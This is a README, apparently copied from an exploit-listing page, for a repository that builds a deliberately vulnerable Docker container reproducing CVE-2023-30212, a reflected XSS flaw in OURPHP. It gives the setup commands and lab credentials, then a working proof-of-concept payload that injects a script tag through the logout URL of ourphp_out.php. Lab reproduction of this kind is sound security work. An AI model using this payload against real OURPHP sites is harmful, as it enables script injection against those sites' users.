Share
## https://sploitus.com/exploit?id=0388EE96-0F76-5D8B-BAD1-92F5CD694079
# Vulnerable-Docker-CVE-2023-30212-
This contains the necessary directories and Dockerfile to replicate A vulnerabality in OURPHP that has a XSS Vulnerability (CVE-2023-30212). 
# Creating a Vulnerable Docker Environment (CVE-2023-30212)

**PRE-REQUISITS**

Download Docker
`sudo apt install -y docker.io`

# Follow below commands step by step: 

**Download the files from this repository using git clone** 
`git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git` .  

This contains necessary directories and dockerfile to replicate the scenario.  


After Downloading the files , build a docker image using 
`sudo docker build -t <Give_Suitable_Docker_name> .  ` .  

! Add a name to the Docker image so that it can be called later.

Convert the Docker image into a container by using 
`sudo docker run -d -p 80:80 <Docker_Image_Name> ` .  

! Here the container port is mapped to port 80.

To see the status of the docker container ,
`sudo docker ps` 

After doing these steps, 

Enter the localhost and configure OURPHP with following credentials.
Username : root
Password : root
Database Name: data 

Now you need to configure username and password for Administrative. Set the following:
Username: root
Password: root 
and proceed 

So our payload is 
`/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>`

add this along with localhost or 127.0.0.1 to trigger XSS.